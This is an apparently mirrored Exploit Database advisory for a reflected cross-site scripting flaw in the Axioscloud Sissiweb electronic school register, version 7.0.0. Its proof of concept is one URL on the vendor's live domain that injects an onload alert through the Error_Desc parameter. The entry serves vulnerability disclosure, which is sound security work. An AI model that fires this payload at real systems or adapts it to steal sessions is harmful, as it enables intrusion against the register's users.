Axioscloud Sissiweb Registro Elettronico 7.0.0 – ‘Error_desc’ Cross-Site Scripting

• Exploit Database
• 19 阅读

• 作者： Dino Barlattani
  日期： 2018-10-24
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/45668/

• # Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
  # Dork: n/a
  # Date: 2018-10-11
  # Exploit Author: Dino Barlattani
  # Vendor Homepage: http://axiositalia.it/
  # Software Link: http://axiositalia.it/?page_id=1907
  # Version: 1.7.0/7.0.0
  # Category: Webapps
  # Platform: ASPX
  # CVE: N/A
   
  # POC:
  # https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=